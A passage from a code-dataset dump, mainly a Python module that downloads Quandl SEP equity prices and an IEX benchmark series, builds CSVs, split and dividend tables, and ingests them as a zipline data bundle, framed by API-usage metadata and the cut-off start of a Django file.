"usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 236, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 237, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling1D", "line_number": 238, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 239, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 240, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 241, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 242, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 245, "usage_type": "call"}, {"api_name": "keras.layers.Bidirectional", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 249, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 250, "usage_type": "call"}, {"api_name": "keras.layers.GlobalMaxPool1D", "line_number": 251, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 252, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 253, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 254, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 260, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 263, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 267, "usage_type": "call"}, {"api_name": "keras.layers.Bidirectional", "line_number": 268, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 268, "usage_type": "call"}, {"api_name": "keras.layers.Attention", "line_number": 276, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 280, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 282, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 283, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling1D", "line_number": 287, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling1D", "line_number": 289, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 292, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 293, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 295, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 296, "usage_type": "call"}, {"api_name": "keras.layers.Concatenate", "line_number": 300, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 302, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Layer", "line_number": 312, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers", "line_number": 312, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MultiHeadAttention", "line_number": 315, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 315, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 316, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 316, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 317, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 317, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LayerNormalization", "line_number": 319, 
"usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 319, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LayerNormalization", "line_number": 320, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 320, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 321, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 321, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 322, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 322, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Layer", "line_number": 333, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers", "line_number": 333, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 336, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 336, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 337, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 337, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 340, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 341, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 347, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 352, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 353, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling1D", "line_number": 354, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 355, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 366, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 366, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 370, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 377, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 378, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 380, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 384, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 385, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 399, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 410, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 414, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 420, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 426, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 427, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 432, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 434, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 444, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 446, "usage_type": "call"}]} +{"seq_id": "604341468", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 14 10:14:23 2018\n\n@author: Prodipta\n\"\"\"\nimport os\nimport pandas as pd\nimport 
quandl\nimport json\nimport sys\nimport requests\nfrom StringIO import StringIO\nfrom datetime import datetime\n\nfrom zipline.data import bundles as bundles_module\nfrom zipline.data.bundles import register\nfrom zipline.data.bundles.SEP import sep_equities\nfrom zipline.data.bundles.ingest_utilities import read_big_csv,if_csvs_in_dir,split_csvs,update_csvs, clean_up, find_interval, upsert_pandas, unzip_to_directory, update_ticker_change, ensure_data_between_dates\n\ndef process_tickers_convention(tickers):\n tickers = [t.replace(\"_\",\"\") for t in tickers]\n tickers = [t.replace(\".\",\"\") for t in tickers]\n return tickers\n\ndef download_data(url, api_key, strpath):\n try:\n r = requests.get(url+api_key, stream=True)\n zipdata = StringIO()\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n zipdata.write(chunk)\n unzip_to_directory(zipdata,strpath)\n except:\n raise IOError(\"failed to download latest data from Quandl\")\n\nclass IngestLoop:\n\n def __init__(self, configpath):\n with open(configpath) as configfile:\n config = json.load(configfile)\n self.config_path = configpath\n quandl.ApiConfig.api_key = config[\"QUANDL_API_KEY\"]\n self.quandl_table_name = config[\"QUANDL_TABLE_NAME\"]\n self.meta_path=config[\"META_PATH\"]\n self.daily_path=config[\"DAILY_PATH\"]\n self.download_path=config[\"DOWNLOAD_PATH\"]\n self.bizdays_file=config[\"BIZDAYLIST\"]\n self.wiki_url=config[\"WIKI_URL\"]\n self.sym_directory=config[\"SYM_DIRECTORY\"]\n self.symlist_file=config[\"SYMLIST\"]\n self.calendar_name=config[\"CALENDAR_NAME\"]\n self.calendar_tz=config[\"CALENDAR_TZ\"]\n self.code_file = config[\"SYMDATA\"]\n self.ticker_change_file = config[\"TICKER_CHANGE_FILE\"]\n self.benchmar_symbol=config[\"BENCHMARK_SYM\"]\n self.benchmark_file=config[\"BENCHMARKDATA\"]\n self.bundle_name=config[\"BUNDLE_NAME\"]\n self.bundle_path=config[\"BUNDLE_PATH\"]\n\n def ensure_codes(self, date):\n if not os.path.isfile(os.path.join(self.meta_path,self.code_file)):\n raise IOError(\"tickers list file missing\")\n\n mtime = pd.to_datetime(datetime.fromtimestamp(os.stat(os.path.join(self.meta_path,self.code_file)).st_mtime))\n mtime = mtime.tz_localize(tz=self.calendar_tz)\n time_delta = date - mtime\n\n if time_delta.days > 5:\n raise ValueError(\"tickers list file is stale, please update\")\n\n self.tickers = pd.read_csv(os.path.join(self.meta_path,self.code_file))\n self.tickers = self.tickers[self.tickers['table']=='SEP']\n\n def ensure_latest_sym_list(self,date):\n self.ensure_codes(date)\n dts = [dt.split(\".csv\")[0].split(\"symbols_\")[1] for dt in os.listdir(os.path.join(self.meta_path,self.sym_directory))]\n dts = pd.to_datetime(sorted(dts))\n lastDate = dts[-1].tz_localize(tz=self.calendar_tz)\n\n if date > lastDate:\n raise ValueError(\"symbol list in the symbols directory is stale. 
Please update\")\n\n def _read_symlist(self,strpath):\n sym_list = pd.read_csv(strpath)\n return sym_list\n\n def ensure_membership_maps(self):\n if os.path.isfile(os.path.join(self.meta_path,self.symlist_file)):\n membership_maps = pd.read_csv(os.path.join(self.meta_path,self.symlist_file))\n last_date = sorted(set(pd.to_datetime(membership_maps.end_date.tolist())))[-1]\n else:\n membership_maps = pd.DataFrame(columns=['symbol','asset_name','start_date','end_date'])\n last_date = pd.to_datetime(0)\n\n dts = [dt.split(\".csv\")[0].split(\"symbols_\")[1] for dt in os.listdir(os.path.join(self.meta_path,self.sym_directory))]\n dts = pd.to_datetime(sorted(dts))\n ndts = [d.value/1E9 for d in dts]\n ndate = last_date.value/1E9\n dts = dts[find_interval(ndate,ndts):]\n\n print(\"updating membership data...\")\n names_dict = dict(zip(self.tickers.ticker,self.tickers.name))\n for dt in dts:\n fname = \"symbols_\"+dt.date().strftime(\"%Y%m%d\")+\".csv\"\n print('reading {}'.format(fname))\n syms = pd.read_csv(os.path.join(self.meta_path,self.sym_directory,fname))['symbol'].tolist()\n syms = process_tickers_convention(syms)\n for sym in syms:\n upsert_pandas(membership_maps, 'symbol', sym, 'end_date', dt, names_dict)\n\n if len(membership_maps) == 0:\n raise ValueError(\"empty membership data\")\n\n print(\"checking for ticker change\")\n syms = membership_maps['symbol'].tolist()\n names = membership_maps['asset_name'].tolist()\n\n tickers_mismatch = [sym for index, sym in enumerate(syms) if sym == names[index]]\n ticker_change = {\"old\":self.tickers['relatedtickers'].tolist(),\"new\":self.tickers['ticker'].tolist(),\"name\":self.tickers['name'].tolist()}\n ticker_change = pd.DataFrame(ticker_change,columns=['old','new','name'])\n ticker_change = ticker_change.dropna()\n\n tickers_list = pd.read_csv(os.path.join(self.meta_path,self.ticker_change_file))\n tickers_list = pd.concat([tickers_list,ticker_change])\n tickers_list = tickers_list[~tickers_list.old.duplicated(keep='last')]\n tickers_list = tickers_list[tickers_list['old'].isin(tickers_mismatch)]\n membership_maps = update_ticker_change(membership_maps,tickers_list)\n\n print(\"updating membership complete\")\n\n membership_maps.to_csv(os.path.join(self.meta_path,self.symlist_file),index=False)\n self.symlist = membership_maps\n\n def _update_bizdays_list(self, dts):\n strpathmeta = os.path.join(self.meta_path,self.bizdays_file)\n init_dts = []\n if os.path.isfile(strpathmeta):\n init_dts = pd.read_csv(strpathmeta)\n init_dts = pd.to_datetime(init_dts['dates']).tolist()\n dts = init_dts + list(dts)\n bizdays = pd.DataFrame(sorted(set(dts)),columns=['dates'])\n bizdays.to_csv(strpathmeta,index=False)\n\n def get_bizdays(self):\n strpathmeta = os.path.join(self.meta_path,self.bizdays_file)\n bizdays = pd.read_csv(strpathmeta)\n return pd.to_datetime(bizdays['dates'].tolist())\n\n def _get_quandl_data_today(self,date):\n dfr = quandl.get_table(self.quandl_table_name, date=date, ticker=\",\".join(self.symlist))\n return dfr\n\n def create_csvs(self, date):\n if not if_csvs_in_dir(self.daily_path):\n dfr = pd.DataFrame(columns=['ticker','date','open','high','low','close',\n 'volume','dividends','closeunadj',\n 'lastupdated'])\n dfr = read_big_csv(self.download_path, self.symlist['symbol'],\"SHARADAR_SEP\")\n split_csvs(dfr,self.daily_path, OHLCV=False)\n dts = dfr['date']\n self._update_bizdays_list(dts)\n del dfr\n\n self.bizdays = pd.read_csv(os.path.join(self.meta_path,self.bizdays_file), parse_dates=[0])['dates'].tolist()\n start_date = 
pd.Timestamp(self.bizdays[-1]) + pd.Timedelta(\"1 days\")\n end_date = pd.Timestamp(date).replace(tzinfo=None)\n if not end_date >= start_date:\n print(\"latest data already available in csv folder\")\n return\n\n date_range = {\"gte\":start_date.date().strftime(\"%Y-%m-%d\"),\n \"lte\":end_date.date().strftime(\"%Y-%m-%d\")}\n print(date_range)\n dfr = quandl.get_table(self.quandl_table_name,\n date=date_range, ticker=\",\".join(self.symlist['symbol']))\n bizdays = set(dfr['date'])\n if len(bizdays) > 0:\n self._update_bizdays_list(bizdays)\n update_csvs(dfr,self.daily_path,OHLCV=False)\n print('daily csvs update completed.')\n\n def ensure_data_range(self):\n if not if_csvs_in_dir(self.daily_path):\n raise IOError(\"csv data files are not available\")\n\n files = [s for s in os.listdir(self.daily_path) if s.endswith(\".csv\")]\n\n for f in files:\n sym = f.split('.csv')[0]\n if sym == self.benchmar_symbol:\n continue\n start_date = self.symlist.start_date[self.symlist.symbol==sym].tolist()[0]\n end_date = self.symlist.end_date[self.symlist.symbol==sym].tolist()[0]\n ensure_data_between_dates(os.path.join(self.daily_path,f),\n start_date, end_date)\n\n def ensure_benchmark(self, date):\n if not os.path.isfile(os.path.join(self.meta_path, self.benchmark_file)):\n raise IOError(\"Benchmark file is missing\")\n\n df0 = pd.read_csv(os.path.join(self.meta_path,\n self.benchmark_file),parse_dates=[0],index_col=0).sort_index()\n df0 = df0.dropna()\n last_date = pd.to_datetime(df0.index[-1]).replace(tzinfo=None)\n date = date.replace(tzinfo=None)\n if date <= last_date:\n print(\"Benchmark file is already updated.\")\n df0.to_csv(os.path.join(self.daily_path,self.benchmar_symbol+'.csv'),\n index_label = 'date')\n return\n\n r = requests.get(\n 'https://api.iextrading.com/1.0/stock/{}/chart/5y'.format(self.benchmar_symbol)\n )\n data = json.loads(r.text)\n df1 = pd.DataFrame(data)\n df1.index = pd.DatetimeIndex(df1['date'])\n df1 = df1[['open','high','low','close','volume']]\n df1 = df1.sort_index()\n\n df = pd.concat([df0,df1])\n df = df[~df.index.duplicated(keep='last')]\n df.to_csv(os.path.join(self.meta_path,self.benchmark_file),\n index_label = 'date')\n df.to_csv(os.path.join(self.daily_path,self.benchmar_symbol+'.csv'),\n index_label = 'date')\n\n def update_membership_maps(self):\n if not if_csvs_in_dir(self.daily_path):\n raise IOError(\"csv data files are not available\")\n\n syms = [s.split(\".csv\")[0] for s in os.listdir(self.daily_path) if s.endswith(\".csv\")]\n membership_maps = self.symlist\n membership_maps = membership_maps[membership_maps.symbol.isin(syms)]\n self.symlist = membership_maps\n membership_maps.to_csv(os.path.join(self.meta_path,self.symlist_file),index=False)\n\n def make_adjustments_maps(self):\n if not if_csvs_in_dir(self.daily_path):\n raise IOError(\"csv data files are not available\")\n\n files = [s for s in os.listdir(self.daily_path) if s.endswith(\".csv\")]\n\n splits = pd.DataFrame(columns=['effective_date','symbol','ratio'])\n divs = pd.DataFrame(columns=['ex_date','symbol','amount'])\n dts = list(self.get_bizdays())\n\n for f in files:\n s = f.split('.csv')[0]\n if s == self.benchmar_symbol:\n continue\n\n start_date = self.symlist.start_date[self.symlist.symbol==s].tolist()[0]\n end_date = self.symlist.end_date[self.symlist.symbol==s].tolist()[0]\n\n dfr = pd.read_csv(os.path.join(self.daily_path, f),\n parse_dates=[0],\n infer_datetime_format=True,\n index_col=0).sort_index()\n dfr = dfr[start_date:end_date]\n\n if len(dfr) == 0:\n continue\n\n ratio 
= dfr['closeunadj']/dfr['close']\n dfr['ratio'] = (ratio/ratio.shift(1)).round(3)\n sdfr = dfr[dfr.ratio != 1].dropna()\n split_data = {'effective_date':sdfr.index,'symbol':[s]*len(sdfr),'ratio':sdfr.ratio}\n split_data = pd.DataFrame(split_data,columns=['effective_date','symbol','ratio'])\n splits = pd.concat([splits,split_data])\n\n ddfr = dfr[dfr.dividends != 0].dropna()\n div_data = {'ex_date':ddfr.index,'symbol':[s]*len(ddfr),'amount':ddfr.dividends}\n div_data = pd.DataFrame(div_data,columns=['ex_date','symbol','amount'])\n divs = pd.concat([divs,div_data])\n\n splits.effective_date = pd.to_datetime(splits.effective_date)\n divs.ex_date = pd.to_datetime(divs.ex_date)\n\n divs['declared_date'] = [dts[max(0,dts.index(e)-1)] for e in list(divs.ex_date)]\n divs['record_date'] = [dts[min(len(dts)-1,dts.index(e)+2)] for e in list(divs.ex_date)]\n divs['pay_date'] = divs['record_date']\n\n divs.declared_date = pd.to_datetime(divs.ex_date)\n divs.record_date = pd.to_datetime(divs.ex_date)\n divs.pay_date = pd.to_datetime(divs.ex_date)\n\n splits = splits.sort_index()\n divs = divs.sort_index()\n\n splits.to_csv(os.path.join(self.meta_path,'splits.csv'),index=False)\n divs.to_csv(os.path.join(self.meta_path,'dividends.csv'),index=False)\n\n def register_bundle(self):\n dts = (self.get_bizdays()).tz_localize(self.calendar_tz)\n register(self.bundle_name, sep_equities(self.config_path),calendar_name=self.calendar_name,\n start_session=None,end_session=None,\n create_writers=False)\n\n def call_ingest(self):\n clean_up(os.path.join(self.bundle_path,\"minute\"))\n clean_up(os.path.join(self.bundle_path,\"daily\"))\n print(\"calling ingest function\")\n self.register_bundle()\n bundles_module.ingest(self.bundle_name,os.environ,pd.Timestamp.utcnow())\n print(\"ingestion complete\")\n\n def run(self, date, update_codes=False):\n if update_codes == 'True':\n download_data(self.code_url,self.api_key,self.meta_path)\n\n self.ensure_latest_sym_list(date)\n self.ensure_membership_maps()\n self.create_csvs(date)\n self.ensure_data_range()\n self.update_membership_maps()\n self.make_adjustments_maps()\n self.ensure_benchmark(date)\n self.call_ingest()\n\n#config_path = \"C:/Users/academy.academy-72/Desktop/dev platform/data/SEP/meta/config.json\"\n#ingest_loop = IngestLoop(config_path)\n\n\ndef main():\n assert len(sys.argv) == 4, (\n 'Usage: python {} '\n ' '.format(os.path.basename(__file__)))\n\n dt = pd.Timestamp(sys.argv[1],tz='Etc/UTC')\n config_file = sys.argv[2]\n update_codes = sys.argv[3]\n\n ingest_looper = IngestLoop(config_file)\n ingest_looper.run(dt, update_codes)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "zipline/data/bundles/sep_ingest_loop.py", "file_name": "sep_ingest_loop.py", "file_ext": "py", "file_size_in_byte": 14589, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 29, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.unzip_to_directory", "line_number": 33, "usage_type": "call"}, {"api_name": "json.load", "line_number": 41, "usage_type": "call"}, {"api_name": "quandl.ApiConfig", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": 
"pandas.to_datetime", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 94, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 97, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.find_interval", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.upsert_pandas", "line_number": 110, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 121, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 125, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.update_ticker_change", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 142, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 148, "usage_type": "call"}, {"api_name": "quandl.get_table", "line_number": 151, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 155, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 156, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.read_big_csv", "line_number": 159, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.split_csvs", "line_number": 160, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp", "line_number": 166, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 166, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 167, "usage_type": "call"}, {"api_name": "quandl.get_table", "line_number": 175, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.update_csvs", "line_number": 180, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 184, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 187, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.ensure_data_between_dates", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 213, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 216, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 217, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 218, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 230, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": 
"zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 240, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 243, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 270, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 271, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 276, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 278, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 285, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path", "line_number": 293, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.register", "line_number": 297, "usage_type": "call"}, {"api_name": "zipline.data.bundles.SEP.sep_equities", "line_number": 297, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.clean_up", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path", "line_number": 302, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.clean_up", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path", "line_number": 303, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest", "line_number": 306, "usage_type": "call"}, {"api_name": "zipline.data.bundles", "line_number": 306, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 306, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp.utcnow", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 306, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 327, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp", "line_number": 331, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 331, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 332, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 333, "usage_type": "attribute"}]} +{"seq_id": "294144050", "text": "from __future__ import absolute_import, unicode_literals, division, print_function\n\n__author__ = 'reyrodrigues'\n\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom . 
